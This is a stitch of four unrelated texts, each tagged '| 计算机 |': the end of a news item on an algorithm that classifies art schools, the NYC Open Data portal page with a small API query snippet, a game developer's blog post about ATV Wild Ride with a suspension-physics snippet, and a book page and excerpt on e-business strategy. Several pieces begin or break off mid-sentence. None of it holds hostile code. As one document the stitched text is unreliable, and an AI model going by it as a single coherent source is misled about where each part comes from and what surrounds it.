According to Shamir, non-experts can normally make the broad differentiation between modern art and classical realism, but they have difficulty telling the difference between closely related schools of art such as Early and High Renaissance or Mannerism and Romanticism.
“This experiment showed that machines can outperform untrained humans in the analysis of fine art,” Shamir said.
Tarakhovsky, who lives in Lake Orion, is the daughter of two Russian artists. Her father was a member of the former USSR Artists. She graduated from an art school at 15 years old and earned a bachelor’s degree in history in Russia, but has switched her career path to computer science since emigrating to the United States in 1998.
Tarakhovsky utilized her knowledge of art to demonstrate the versatility of an algorithm that Shamir originally developed for biological image analysis while working on the staff of the National Institutes of Health in 2009. She designed a new system based on the code and then designed the experiment to compare artists.
She also has used the computer program as a consultant to help a client identify bacteria in clinical samples.
“The program has other applications, but you have to know what you are looking for,” she said.
Tarakhovsky believes that there are many other applications for the program in the world of art. Her research project with Shamir covered a relatively small sampling of Western art. "This is just the tip of the iceberg," she said.
At Lawrence Tech she also worked with Professor CJ Chung on Robofest, an international competition that encourages young students to study science, technology, engineering and mathematics, the so-called STEM subjects.
“My professors at Lawrence Tech have provided me with a broad perspective and have encouraged me to go to new levels,” she said.
She said that her experience demonstrates that women can succeed in scientific fields like computer science and that people in general can make the transition from subjects like art and history to scientific disciplines that are more in demand now that the economy is increasingly driven by technology.
“Everyone has the ability to apply themselves in different areas,” she said. | 计算机 |
HomeDevelopers
Data Mine
About NYC Open Data
Contact NYC Open Data
Mayor's Office of Operations
Search all NYC.gov websites
Research & Analytics
Data Sets Available
Datasets (All Categories)
NYC's Data Catalog
Suggest a Dataset
Nominate and Discuss possible data
Mayor's Management Report
Citywide Performance Scorecard
Getting Started with Our APIs
Access Data with the SODA API
API Endpoints
Find API endpoints for our data
API Queries
Discover how to get just the data you want
NYC Developer Portal
More NYC Government APIs
NYC DoITT
NYC Information Technology and Telecommunications
NYC MoDA
NYC Mayor's Office of Data Analytics
NYC Digital
Learn more about NYC Open Data
Read the terms of use for the data on this site
Technical Standards Manual
Read the law, policies, and standards that help us make data public
Socrata Support
Get technical support from Socrata
Open Data FAQs
Site Analytics
See usage, access rates and other key metrics
The following Terms of Use apply to visitors to the NYC OpenData portal and application developers who obtain City data through this single web portal:
By accessing data sets and feeds available through the NYC OpenData portal (or the "Site"), the user agrees to all of the Terms of Use of NYC.gov as well as the Privacy Policy for NYC.gov. The user also agrees to any additional terms of use defined by entities providing data or feeds through the Site. Entities providing data include, without limitation, agencies, bureaus, offices, departments and other discrete entities of the City of New York ("City"). Public data sets made available on the NYC OpenData portal are provided for informational purposes. The City does not warranty the completeness, accuracy, content, or fitness for any particular purpose or use of any public data set made available on the NYC OpenData portal, nor are any such warranties to be implied or inferred with respect to the public data sets furnished therein.
The City is not liable for any deficiencies in the completeness, accuracy, content, or fitness for any particular purpose or use of any public data set, or application utilizing such data set, provided by any third party.
Submitting City Agencies are the authoritative source of data available on NYC OpenData. These entities are responsible for data quality and retain version control of data sets and feeds accessed on the Site. Data may be updated, corrected, overwritten and/or refreshed at any time. The anticipated update frequency is indicated for each data set on the Site. Older versions of data sets will not be retained.
NYC Open Data makes the wealth of public data generated by various New York City agencies and other City organizations available for public use. As part of an initiative to improve the accessibility, transparency, and accountability of City government, this catalog offers access to a repository of government-produced, machine-readable data sets.
Anyone can use these data sets to participate in and improve government by conducting research and analysis or creating applications, thereby gaining a better understanding of the services provided by City agencies and improving the lives of citizens and the way in which government serves them.
The data sets are available in a variety of machine-readable formats and are refreshed when new data becomes available. Data is presented by category, by City agency, or by other City organization. Descriptions of the data, the collection method, and other contextual material, called metadata, make the data sets easier to understand and use. Use of these data sets and how they are generated can be better understood by reading the Terms of Use.
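For developers, pulling one of these data sets down is typically a single HTTP request against the portal's Socrata Open Data API (SODA). In the sketch below, the dataset id "abcd-1234" and the column name are placeholders; the real id appears on each data set's catalog page.

```python
import requests

url = "https://data.cityofnewyork.us/resource/abcd-1234.json"
params = {"$limit": 100, "$where": "created_date > '2013-01-01'"}

rows = requests.get(url, params=params).json()  # list of JSON records
for row in rows[:5]:
    print(row)
```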
How the City Uses Data to Create a Better City
The Mayor’s Office of Data Analytics (MODA), the Department of Information Technology and Telecommunications (DOITT), and NYC Digital work together to collect, analyze, and share NYC Data, to create a better City supported by data-based decision making, and to promote public use of City data.
The City of New York is a national model for collecting data to measure government performance. Agencies routinely collect data on buildings, streets, infrastructure, businesses, and other entities within the City, including permits, licenses, crime related data, and 311 complaints. MODA centralizes City data, uniting previously disconnected pieces of information from various agencies, and pairs it with NY state, federal, and other open data to create a comprehensive City-wide data platform that serves as a record of City activity, and a foundation for NYC Open Data. DoITT and MODA work closely together to use that platform, DataBridge, to reduce safety risk in the City, deliver daily services more efficiently, and enforce laws more effectively.
The mission of NYC Digital is to realize New York City's potential as the world's leading digital city, by creating meaningful public-private partnerships that serve New Yorkers and support economic development. NYC Digital produces the City's Digital Roadmap, NYC's technology plan for access, education, open government, engagement, and industry. In partnership with MODA, NYC Digital directs Code Corps, the nation's first municipal program that engages vetted volunteer technologists to support City emergency and disaster recovery needs.
Administration for Children's Services (ACS)
Alliance for Downtown New York
Banking Commission
Board of Correction (BOC)
Board of Elections (BOENY)
Board of Standards and Appeals (BSA)
Bronx Borough President (BPBX)
Brooklyn Borough President (BPBK)
Brooklyn Public Library (BPL)
Business Integrity Commission (BIC)
Campaign Finance Board (CFB)
City Clerk & Clerk of the Council (OCC)
City Council (NYCC)
City Employees' Retirement System (NYCERS)
City University of New York (CUNY)
Civilian Complaint Review Board (CCRB)
Commission on Human Rights (CCHR)
Commission on Women's Issues (CWI)
Commission to Combat Police Corruption (CCPC)
Conflicts of Interest Board (CONFLICTS)
Department for the Aging (DFTA)
Department of Buildings (DOB)
Department of City Planning (DCP)
Department of Citywide Administrative Services (DCAS)
Department of Consumer Affairs (DCA)
Department of Correction (DOC)
Department of Cultural Affairs (DCLA)
Department of Design and Construction (DDC)
Department of Environmental Protection (DEP)
Department of Finance (DOF)
Department of Health and Mental Hygiene (DOHMH)
Department of Homeless Services (DHS)
Department of Housing Preservation and Development (HPD)
Department of Information Technology & Telecommunications (DoITT)
Department of Investigation (DOI)
Department of Parks and Recreation (DPR)
Department of Probation (DOP)
Department of Records and Information Services (RECORDS)
Department of Sanitation (DSNY)
Department of Small Business Services (SBS)
Department of Transportation (DOT)
Department of Youth and Community Development (DYCD)
Economic Development Corporation (EDC)
Equal Employment Practices Commission (EEPC)
Financial Information Services Agency (FISA)
Fire Department of New York City (FDNY)
Fire Department Pension Fund & Related Funds
Health and Hospitals Corporation (HHC)
Human Resources Administration (HRA)
Landmarks Preservation Commission (LPC)
Latin Media & Entertainment Commission (LMEC)
Law Department (LAW)
Loft Board (LOFT)
Manhattan Borough President (MBPO)
Mayor's Office of Adult Education (ADULTED)
Mayor's Office of Data Analytics (MODA)
Mayor's Office of Long-Term Planning and Sustainability (OLTPS)
Mayor's Office of Media And Entertainment (MOME)
Mayor's Office of Operations (OPS)
Mayor's Office to Combat Domestic Violence (OCDV)
Metropolitan Transportation Authority (MTA)
New York City Housing Authority (NYCHA)
New York City Tax Commission (TAXC | 计算机 |
Renegade Kid’s start was somewhat of an explosive one
with the release of Dementium: The Ward. It was the right game, in the right
market, at the right time. It put our company on the map – at least within the
Nintendo DS community.
The success of our debut title lead to the development of
Moon, which may not have met with the same success in terms of sales, but it
connected with fans thanks to improved story-telling and sense of adventure –
scoring higher with reviewers across the board.
With SouthPeak's purchase of Gamecock, Dementium II was
born and enabled us to pour more resources than we ever had into the
development of a game. The result was something very special with variety and
gore to please those who appreciate such things.
In terms of development, we were building some great
momentum as a team and felt very fortunate to have developed three first-person
shooters in a row. However, the market was changing. It was 2010 and everyone
seemed to be cranking their “mitigating risk” levers up to the max!
Publishers have always been tight with their cash, understandably,
but it was getting to the point where we could not find any publishing partners
willing to invest in the development of… well, anything really.
Forget original adventure games, we couldn’t even land
license game gigs! It was a very difficult time for developers in the industry
as a whole, and the DS market was no exception. We needed to get creative! We
needed to find a way to land a deal and still try to have fun doing what we do.
I turned to the data. The sales data, that is. Looking at
which games sold well in the past does not predict the future, but it shows you where audiences have existed, which at least suggests they may still
exist.
After filtering out all of the Nintendo games and big
license games (movie and TV tie-ins) you are left with virtual pet games, racing games, and… not very
much else in terms of consistent genres that performed well in the DS market.
Huh, well that’s a bit depressing.
Believe it or not, we did actually create a concept for a
virtual pet game, but never found a home for it. That’s probably a good thing.
And with regards to the racing genre, many of them utilized licensed vehicles
and such to help promote them. That is, except one specific racing genre.
There was a number of ATV racing games released on the DS
that sold quite well. At least enough to show there’s potential for investment
there. I immediately tracked them all down and played them. Unfortunately, none
of them were fun to play. Fortunately, none of them were fun to play! This gave
us an opportunity to actually offer a good ATV racing game for the DS market.
The ATV racing genre is an interesting one. At the time, I
was not sure if the term “ATV” was owned by someone. Was it something that
needed to be licensed, y’know, kind of like NBA and stuff like that?
Apparently, the answer to that is a wonderful “no”. It is just a general term,
kind of like SUV.
It just so happened that I had been playing Pure on the
Xbox 360 around that time, and found it to be tremendous fun. More on that later.
Now, the reason I wanted to find a genre that had sold
well was primarily to sell the idea to a publisher. Even if you present a
publisher with an outstanding game concept, if you can’t back it up with sales
data you’re going to have a tough time convincing them to invest their money
into the development of the game.
So, we had a genre that had generally performed quite
well in the DS market. There are a handful of ATV titles that sold a
respectable amount. From this we can present a decent justification for why a
new (and better?) ATV game is a great choice for the DS market, right? In
theory, yes, but…
In reality, it was a tough slog trying to find a home for
the game. At that point we were just sending out pitch documents to publishers, which explained the features of the game and sales data on how previous ATV titles had
performed in the market. It wasn’t working, so we needed to step up our game
a bit.
If you have played
Moon on the DS, you’ll be familiar with the buggy sections. My hope was to use
this as the foundation for our new ATV racing game. In the span of just two weeks we
cobbled together a playable demo of an ATV racing game. It did not feature everything
the game needed, but it demonstrated the basic concept and, if I may be so bold
to say, proved that a good ATV racing game could be achieved on the DS!
We started shopping the playable demo around to
publishers, and got some good feedback. Things were starting to look a bit more
promising. However, no contracts were being sent to us despite it being a somewhat “safe”
proposal. It was time to get even more creative!
We looked at our development budget and cut it in half,
offering publishers a co-development deal. This reduces the financial risk
publishers need to take, off-loading a large amount of it onto us, while also offering us the
opportunity to make more money on the back-end in royalties.
Yes, we got a bite! The fine folks at Destineer were
on-board with the new proposal and we went full-steam towards completing
development of the game. Working with Tony and Matt at Destineer was great. The
executive producers/producers you work with at a publisher can make all of the
difference. Thanks to the fact that both Tony and Matt are great people, the development process was fun and creative.
Our focus was to try and capture the excitement and energy of Pure. Even if were able to capture only an ounce of what Pure offered, we felt that we'd have a fun game on our hands. To me, that means exotic locations, big jumps, cool tricks, and nitro boosts!
Despite all of this goodness, the short version of how well
the game performed in the DS market is: not good. We won’t
know how well it could have performed in the DS market due to the unfortunate fact that Destineer was in a difficult
situation at the time and unable to distribute the game as originally planned. Some copies went out to retail, but it was a very limited run. It was no fault of Destineer’s. It was just bad timing.
ATV Wild Ride on the DS was received well in the press
with Destructoid scoring it 8/10 calling it, “One of the best racer offerings
on Nintendo’s handheld to date.” Games Abyss scored it 9.5/10 saying, “ATV Wild
Ride not only delivers on the fun factor, it makes me appreciate the genre a
whole lot more than I ever would have imagined.”
So, the idea of bringing ATV Wild Ride to the 3DS was not
a difficult one for us to decide. We have faith in the game. It delivers fun! Now, due to the fact that we have been busy working
on a multitude of different games for the 3DS, and other platforms, it has taken a little
longer than originally expected to complete. But, we’re nearly finished!
As with the DS version, we initially pitched the game to
publishers for a retail release, but got no bites due to the newness of the 3DS
platform and the early negative reports of the 3DS and how it was doomed due to
the mobile market. I am thankful this happened. Not only has the 3DS market
grown to be a very successful one, it has also given us the opportunity to
publish it ourselves on the Nintendo eShop.
Our focus for ATV Wild Ride 3D has been to create an
enhanced port of the DS game. The sad fact is that practically no one bought
the original DS version of the game. However, even those 10 people who did
purchase the DS version will hopefully agree that the 3DS version is closer to a
console racing experience than ever before. Not only have we upgraded the art,
with the fancy tricks the 3DS affords such as, specular highlights, mip-maps,
higher resolution textures, real-time lighting, shadow maps, and the like – we have
also been able to work on the physics; adding suspension to the ATVs. This is a
relatively subtle addition that, in my opinion, improves how the game feels.
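For readers curious what "adding suspension" usually means in code, here is a minimal spring-damper wheel model. The constants and integration step are illustrative guesses, not Renegade Kid's actual tuning.

```python
STIFFNESS = 120.0          # spring constant (k)
DAMPING = 8.0              # damper constant (c)
REST_LENGTH = 0.5          # suspension length at rest

def step(length, velocity, dt=1.0 / 60.0, mass=1.0):
    # Spring pushes back toward the rest length; damper resists the motion.
    force = STIFFNESS * (REST_LENGTH - length) - DAMPING * velocity
    velocity += (force / mass) * dt
    length += velocity * dt
    return length, velocity

length, velocity = 0.3, 0.0   # compressed, e.g. right after landing a jump
for _ in range(10):
    length, velocity = step(length, velocity)
    print(f"{length:.3f}")    # settles back toward the rest length
```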
We have fully funded the development of ATV Wild Ride 3D.
This not only means the cost of creating the game itself, but also additional
expenses such as the QA team to ensure the game is bug free and ready for
Nintendo’s lotcheck. And, now we’re in the final stretch. This is the first
week of what we’re expecting (hoping) to be a three week QA focus before we
submit the game to Nintendo for their approval. The game is already very solid,
so I think we’re in good shape.
Now starts the PR push. With little to no money to spend
on advertising, we just have to put our thinking caps on and try to drum up
some exposure and interest in the game. We have created a 3D trailer for the
eShop, which will hopefully be included in the “Coming Soon!” section in the
next few weeks. We will send the game out to the press a week or two before the
launch for previews, reviews, and interviews.
And then, we wait for the game to launch, which as of
today looks like March 2013. We would like to release the game in the US and
Europe at the same time, but it depends on when we receive age rating from PEGI,
USK and COB. We already have the ESRB rating. In fact, I got it within 10
minutes of applying for it. ESRB are great. The others need to follow suit. So,
if the game does not release in Europe at the same time as the US, you’ll know
why. That would make me sad, but we cannot risk missing this quarter with the US
release of the game.
Will the game sell well or w | 计算机 |
Ravi Kalakota, Marcia Robinson
(First Edition)
Alan Taetle, Former Executive Vice President of MindSpring and General Partner of the Venture Capital Firm, Noro-Moseley Partners: This is the first book on e-business to combine a clarity of vision that will help you to appreciate the true significance of e-business, with a rigorous roadmap for reinventing your business design. If you want to avoid being blindsided by your competition, you must make this book required reading in your organization.

Mohanbir Sawhney, Tribune Professor of Electronic Commerce and Technology, Kellogg Graduate School of Management, Northwestern University: As e-commerce solutions, enterprise applications, and business models converge in new ways, a tidal wave of change is transforming industries, redefining competitive strategies, and annihilating traditional thinking. To survive and thrive in the e-commerce world, all companies, from established industry leaders to feisty upstarts, are remaking themselves into lean, mean e-business machines that serve, delight, and retain customers better than ever before. How do they do it? Not with new products or innovative technology, but with superior e-business designs. Startups and some nimble incumbents have each created an e-business design by which they serve customers, differentiate their supply chains, integrate their selling chains, procure products, and nurture relationships. e-Business: Roadmap for Success illustrates how managers are rewiring the enterprise to confront the e-commerce onslaught, uprooting traditional business applications as we know them. The authors create an innovative application framework for structural migration from a legacy model to an e-business model. Drawing on their experience with and research of leading businesses, Kalakota and Robinson identify the fundamental design principles for building the e-business blueprint.
Booknews
Surveys how some successful companies have redesigned their structure and practices to do business on the Internet, and glean from them fundamental design principles for building an electronic business blueprint. Annotation c. Book News, Inc., Portland, OR (booknews.com)
Addison Wesley Longman, Inc.
Information Technology Series
E-Commerce - Management
E-Commerce - Reference
Read an Excerpt Chapter One From e-Commerce to e-Business What to Expect New economy new tools, new rules. Few concepts have revolutionized business more profoundly than e-commerce. Simply put, the streamlining of interactions, products, and payments from customers to companies and from companies to suppliers is causing an earthquake in many boardrooms. Managers are being forced to reexamine traditional definitions of value as we enter a new millennium. To thrive in the e-commerce world, companies need to structurally transform their internal foundations to be effective. They need to integrate their creaky applications into a potent e-business infrastructure. In this chapter, we'll look at the mechanics of e-business and its impact. We describe what e-business is and how it is changing the market. Included are steps you can take to disaggregate and reaggregate value chains to create the e-business model. ·How did Amazon.com, an online bookstore that started in 1995 with two employees in a rundown warehouse in Seattle, grow revenues in only three years to more than $600 million in 1998, outmaneuvering the two 800-pound gorillas in the book retail business, Barnes & Noble and Borders Books & Music? ·Why is it that consumers can go online to buy a $1,999 built-to-order PC from Gateway Computer, but they cannot go online to buy a customized $5,000 color copier from Xerox? ·Why can you trade stocks and options online through Charles Schwab, butyou can't go online to view or make changes to your Cigna or Kaiser health insurance plan? ·Why does it take only a few minutes to choose a flight, buy an airline ticket, and reserve a hotel room and a car through Microsoft Expedia, an integrated online travel transaction site, but it takes twice that long to speak with an American, United or Delta travel agent? ·How can FedEx and UPS make it easy for customers to track their packages, create airbills, and schedule pickups on the Web, but banks cannot tell their customers the status of online bill payments made to the local phone company? · Why is it that Cisco, an internetworking company that makes routers and switches, can overhaul its product line every two years, but Kodak cannot seem to deliver rapid innovations to meet changing customer requirements? In short, what makes some companies successful in the digital economy? Visionary companies understand that current business designs and organizational models are insufficient to meet the challenges of doing business in the e-commerce era. If you take a close look at such leading businesses as Dell, Cisco, and Amazon.com, you'll find a new business design, one that emphasizes a finely tuned integration of business, technology, and process. In many cases, these companies are tapping technology to streamline operations, boost brands, improve customer loyalty, and, ultimately, drive profit growth. Visionary firms are setting new rules within their industries via new technobusiness designs, new interenterprise processes, and integrated operations to support changing customer requirements. They realize that the next wave of customer-centric innovation requires businesswide integration of processes, applications, and systems on an unprecedented scale. We call this businesswide integration e-business, the organizational foundation that can support business in the Net economy, and it's forcing companies to ask three questions: 1. How will e-commerce change our customer priorities? 2. How can we construct a business design to meet these new customer priorities? 
3. What technology investments must we make to survive, let alone thrive?

Look around your own company. Look at the problems that are preoccupying senior management, and look at current priorities: market share versus short-term profits, revenue growth versus cost. What are the high-profile projects that have been initiated or proposed recently to accomplish these priorities? Now think about the digital future and analyze your company's ability to compete with new entrants that don't have your company's baggage: legacy applications, calcified processes, and inflexible business models.

Next, ask yourself questions about strategy: Does my senior management have a clear understanding of how our industry is being shaped by new e-business developments? Do they suffer from flawed assumptions, or blind spots, in interpreting industry-level changes? Do they recognize the threat posed by new and unconventional rivals? Are they willing to make changes to the business model before it's too late? Are they setting the right priorities to be rule makers, rather than rule takers?

Now be brutally honest with yourself about your company's readiness to execute change. Does management understand the implementation side of strategy? Do they know that the entire business platform is being transformed by a new generation of enterprise applications? Do they understand the risks, challenges, and difficulties in integrating and implementing the complex enterprise applications necessary for an e-business enterprise? Do they understand what it takes to build interenterprise applications such as supply chain management, which is the backbone of e-business?

These are not rhetorical questions. Thoughtful answers will help you shape the transformation agenda that forms the e-business backbone. Our goal is to show the logic of e-business, so that everyone on your management team can participate in creating a new infrastructure. If understanding is to be our guiding principle, then many enlightened managers are better than one. If technology is to be our driving force, then its principles must be accessible to management, not reserved, as is sometimes the case, for only an anointed few who have managed to penetrate its thick fog and hype. So let's get started in linking today's business with tomorrow's technology.

Linking Today's Business with Tomorrow's Technology

It's happening right before our eyes: a vast and quick reconfiguration of commerce on an evolving e-business foundation. What is the difference between e-commerce and e-business? We define e-commerce as buying and selling over digital media. e-Business, in addition to encompassing e-commerce, includes both front- and back-office applications that form the engine for modern business. e-Business is not just about e-commerce transactions; it's about redefining old business models, with the aid of technology, to maximize customer value. e-Business is the overall strategy, and e-commerce is an extremely important facet of e-business.

Why is e-business a big deal? CEOs everywhere are faced with shareholder demands for double-digit revenue growth, no matter what the business environment is. They've already reengineered, downsized, and cut costs. Consequently, CEOs are investigating new strategic initiatives to deliver results, and many are looking at using technology to transform the business model; in other words, harnessing the power of e-business.
e-Business is being driven by a profound, evolving development: Every day, more and more individuals and companies worldwide are being linked electronically. While on the surface this does not appear to be a big deal, digitally binding consumers and companies in a low-cost way is as significant as the invention of the steam engine, electricity, the telephone, and the assembly line. It's causing the stodgy old conventions of business built on information asymmetry to be cast aside. So it's no surprise that the rules of the game are being rewritten (see Table 1.1).

Let's start by looking at the first rule of e-business: Technology is no longer an afterthought in forming business strategy, but the actual cause and driver. While the effect of technology on business strategy may not be clear initially, it is relentless and cumulative, like the effects of water over time. Technology comes in waves. As the ocean erodes the shore, so will technology erode strategies, causing an entire business model to behave in hard-to-predict ways. Consequently, e-commerce is not something that businesses can ignore. e-Commerce poses the most significant challenge to the business model since the advent of computing itself. While the computer automates tasks, increasing business speed, it hasn't fundamentally altered the business foundation; e-commerce does. If any entity in the value chain begins to do business electronically, companies up and down that value chain must follow suit, or risk being substituted. Therefore, rethinking and redesigning the business model is not one of many options available to management; it is the first step to profiting, even surviving, in the information era.

Are executives at large companies aware that the impact of these changes is of seismic proportions? Some are; most are not. The majority of managers are too busy dealing with a multitude of operational problems. Executives can't afford to think too much as they try to get more juice from their current business models. Time is tight; resources are tighter. If they sit around inventing elegant strategies and then try to execute them through a series of flawless decisions, the current business is doomed. If they don't think about the future, the business is doomed. To do business differently, managers must learn to see differently. As John Seely Brown, chief scientist of Xerox, puts it, "Seeing differently means learning to question the framework through which we view and frame competition, competencies and business models." Maintaining the status quo is not a viable option. Unfortunately, too many companies develop a pathology of reasoning, learning, and attempting to innovate only in their own comfort zones. The first step to seeing differently is to understand that e-business is about structural transformation.

e-Business = Structural Transformation

If e-commerce innovation is the cause of a revolution in the rules of business, what is the effect? In short, structural transformation. The results are a growing pace of application innovation, new distribution channels, and competitive dynamics that are baffling even the smartest managers. As technology permeates everything we do, business transformation is becoming harder to manage because the issues of change play out on a much grander scale. Increasingly, value is found not in tangible assets such as products, but in intangibles: branding, customer relationship, supplier integration, and the aggregation of key information assets.
This observation leads to the second rule of e-business: The ability to streamline the structure and to influence and control the flow of information is dramatically more powerful and cost-effective than moving and manufacturing physical products. This rule is the core driver of structural transformation. Ironically, it seems that few companies have developed the necessary information-centric business designs to deal with the issues of business change and innovation. Changing the flow of information requires companies to change not just the product mix, but perhaps more important, the business ecosystem in which they compete. Unless an enterprise develops an explicit strategy to accommodate the accelerated flow of information, the enterprise will find itself scrambling, working harder and faster just to stay afloat. There is always hope that some magical silver bullet will appear and pierce the walls blocking the smooth flow of information, but that isn't likely.

Transformation Stakes Are Very High

Why do successful firms fail? The marketplace is cruel to companies that don't adapt to change. History shows that organizations best positioned to seize the future rarely do so. As Alvin Toffler pointed out in Future Shock, either we do not respond at all or we do not respond quickly enough or effectively enough to the change occurring around us. He called our paralysis in the face of demanding change "future shock." Too often, senior managers fail to anticipate change, become overconfident, lack the ability to implement change, or fail to manage change successfully.

For example, in the 1980s, IBM and Digital Equipment were positioned to own the PC market, but they did nothing when upstarts such as Compaq, Dell, and Gateway took the market by storm. Why? Because their commitment and attention were directed elsewhere. Even as late as the early 1990s, Digital's official line was that PCs represented a niche market with only limited growth potential. Digital Equipment dug itself into a hole from which it was impossible to escape and consequently was acquired by Compaq, a company it could have bought many times over in the 1980s. In hindsight, Digital's management should have transformed its business design to rely less on mainframe computers and more on tapping into the PC, client/server, and Web revolution.

As this case illustrates, perhaps the greatest threat companies face today is adjusting to nonstop change in order to sustain growth. Constant change means organizations must manufacture a healthy discomfort with the status quo, develop the ability to detect emerging trends faster than the competition, make rapid decisions, and be agile enough to create new business models. In other words, to thrive, companies will need to exist in a state of perpetual transformation, continuously creating fundamental change. Throw in the resulting time-to-market pressures, and you have a serious challenge indeed.

This observation leads us to the third rule of e-business: Inability to overthrow the dominant, outdated business design often leads to business failure. If a business design is faulty or built on old assumptions, no amount of fixing and patching will do any good for competing in the digital economy. It's become accepted wisdom that the survival of a company depends on its ability to anticipate, gauge, and respond to changing customer demands in a timely manner.
Standing still and waiting for the silver bullet leads only to heartbreak, and working harder and longer leads only to companywide frustration. Neither is realistic for addressing an issue that affects the very future of the enterprise: How should a company design itself to compete in the new, networked economy?

e-Business Requires Flexible Business Designs

In order to deal with change, companies and autonomous business units need an effective business design that allows them to react rapidly and continuously, innovate ceaselessly, and take on new strategic imperatives faster and more comfortably. Are companies organized to deal with dynamic change? Not really. Virtually every enterprise finds itself stretched to the limit, attempting to maintain viability and profitability in the face of unparalleled uncertainty and change in every dimension of its business environment. And there is no relief in sight.

To deal with dynamic change, many organizations have sought refuge in outsourcing, the argument for which is simple: Individual companies simply cannot do everything well. True enough. In the first generation of outsourcing, the focus was on gaining efficiency and cost reduction, not on pleasing customers. For instance, because of the increasing complexity of computers and networks, more and more firms began outsourcing their technology management. Among the biggest beneficiaries of this trend have been computer service firms, such as IBM, Andersen Consulting, and EDS. BellSouth outsourced its entire information technology (IT) function to EDS and Andersen Consulting in a contract worth more than $4 billion. But the outsourcing boom extends well beyond computers. In recent years, outsourcing in the form of contract manufacturing has caught on considerably as companies search for ways to cut costs. Examples of contract manufacturing abound in the high-tech industry: Solectron, Flextronics, and SCI Systems.

Outsourcing is changing the nature of the relationship between contract manufacturers and the original equipment manufacturers (OEMs). In the past, they danced like detached partners, but now they're cheek to cheek. Why? If the objective is to please customers, the best relationship for both parties is to behave as a single company: truly cooperative and integrated. This means that firms have to share sensitive design information, link internal application systems, and provide shared services throughout the supply chain. In a growing number of cases, outsourcers finish the product, slap on the logo, and ship it to the user or distributor. It's the wave of the future. As companies face complex business challenges, they increasingly farm out many tasks to cut down on time to market.

Increasingly, new entrants in e-business use outsourcing alliances as a business model to gain market position against a leader. This strategy is often called GBF, "get big fast." This new generation of outsourcing alliances is called a variety of names, including e-business communities, clusters, and coalitions. While successful strategies differ widely from industry to industry, a common thread runs through them: They all seek to nullify the advantages of the leader by using outsourcing to quickly create reputation, economies of scale, cumulative learning, and preferred access to suppliers or channels. Amazon.com successfully attacked Barnes & Noble using this strategy, and Yahoo! used it to overtake Microsoft Network in the portal business.
This trend brings us to the fourth rule of e-business: The goal of new business designs is to create flexible outsourcing alliances between companies that not only off-load costs, but also make customers ecstatic. With emerging technology, outsourcing alliances are becoming less painful to implement, especially if both sides are using similar business application software. This trend makes every market leader vulnerable. Distributors are especially threatened, because new online intermediaries are able to replicate their business model at a very low cost. New entrants in the distribution business are differentiating themselves in two key ways: They're easy to do business with, and they add value through innovative services, such as inventory management. Ease of doing business is seen as critical as costs go down, even if the new entrant does not lower prices. Complex outsourcing arrangements are not optional anymore: They are the only way companies can fill voids in their arsenals. Currently, there are very few guidelines for managers to follow as they go about the task of creating new business designs that leverage outsourcing. Still, in our work with several leading companies, we find a recurring theme that firms are implementing to fashion new business models: disaggregation and reaggregation.

Value Chain Disaggregation and Reaggregation

The value of any business is in the needs being served, not the products being offered. Disaggregation allows firms to separate the means (products) from the ends (customer needs). Disaggregation requires identifying, valuing, and nurturing the true core of the business: the underlying needs satisfied by the company's products and services. This approach allows managers to disassemble the old structure, rethink core capabilities, and identify what new forms of value can be created. Intel, with its constant innovation in chip design and manufacturing, is a prime example of the disaggregation and reaggregation strategy. Disaggregation is crucial for leaders such as Intel because successful organizations may need to abandon old paradigms (systems, strategies, and products) while they still possess equity. The foresight to cannibalize a working business design takes courage because it involves risk, but the payoff can be enormous.

Reaggregation enables businesses to create a configuration that streamlines the entire value chain. It can also help to create an unparalleled customer experience that satisfies a need while engaging, intriguing, and connecting clients. Evidence abounds that new reaggregated business designs are being built on a well-integrated set of enterprise software applications (or killer apps). These enterprise applications represent the backbone of the modern corporation. Reaggregation enables new entrants to compete differently, even though they're competing with the same scope of activities as well-established leaders. Amazon.com reaggregated the value chain to perform individual activities differently, although it offers the same scope of activities as leader Barnes & Noble. The objective of reaggregation is to either lower cost or enhance differentiation. Using technology to reaggregate value chains is central to the digital economy.

The Road Ahead: Steps to a New Beginning

The steps in disaggregation and reaggregation follow a systematic logic, and they're the same for everybody: startups, visionary firms, and established companies:

1. Challenge traditional definitions of value.

2. Define value in terms of the whole customer experience.
3. Engineer the end-to-end value stream.

4. Integrate, integrate, and integrate some more. Create a new technoenterprise foundation that is customer-centric.

5. Create a new generation of leaders who understand how to create the digital future by design, not by accident.

Let's focus on established companies, because they need the most help in transforming themselves. It is critical for established companies to understand that we are at a crossroads in history, a time when e-commerce is making a transition from the fringe market, dominated by innovators and early adopters, to the mainstream market, dominated by pragmatic customers seeking new forms of value. Established companies that don't pay attention to this shift are going to face hard times.

Why is it difficult for established companies to see the writing on the wall? Primarily because most want to "stick to the knitting," that is, to continue to do what made them successful. They don't want to cannibalize existing product lines, and they tend to fall back on simple formulas: lower cost, operational efficiency, increased product variety. They should look at technology as a way to make their customers' lives easier and give them more value for their money. Established companies must challenge traditional definitions of value. They must learn to take advantage of new technologies to create and deliver new streams of value.

Challenge Traditional Definitions of Value

Customers want companies that they do business with to continuously improve the following:

· Speed. Service can never be too fast. In a real-time world, there is a premium on instant, accurate, and adaptive response. Visionary companies embrace constant change and consistently deconstruct and reconstruct their products and processes to provide faster service.

· Convenience. Customers value the convenience of one-stop shopping, but they also want better integration between order entry, fulfillment, and delivery; in other words, better integration along the supply chain.

· Personalization. Customers want firms to treat them as individuals. Artificial constraints on choice are being replaced with the ability to provide the precise product customers desire.

· Price. Nothing can be too affordable. Companies that offer unique services for a reasonable price are flourishing, benefiting from a flood of new buyers.

In every business, managers should ask how they can use new technology to create a new value proposition for the customer. If they figure it out, they will succeed. Lots of firms are already doing it, including such companies as Domino's Pizza, Dell, Amazon.com, and Auto-By-Tel. These visionary companies are meeting new customer expectations by improving products, cutting prices, or enhancing service quality.

Domino's Pizza's mission is to be the leader in off-premise pizza convenience to consumers around the world. Founded in 1960 by Thomas S. Monaghan, Domino's owes its success to a few simple precepts. The company offers a limited menu through carryout and delivery, and every pizza is delivered with a Total Satisfaction Guarantee: Any customer not completely satisfied with the Domino's Pizza experience will be offered a replacement pizza or a refund. By raising the quality of service and the level of innovation that customers expect, market leaders like Domino's are constantly pushing the competitive frontiers into uncharted territories and driving their slower-moving competition back to the drawing board.
The ability to view the world from the customer's perspective often prevents visionary companies from starting in the wrong place and ending up at the wrong destination. Innovators look for what new things customers value, rather than focusing on differences among customers. Often companies rely too much on market segmentation and forget that segmentation techniques work well only in stable settings. Segmentation is difficult to execute in a turbulent environment in which the value proposition constantly changes.

e-Commerce Is Changing the Notion of Value

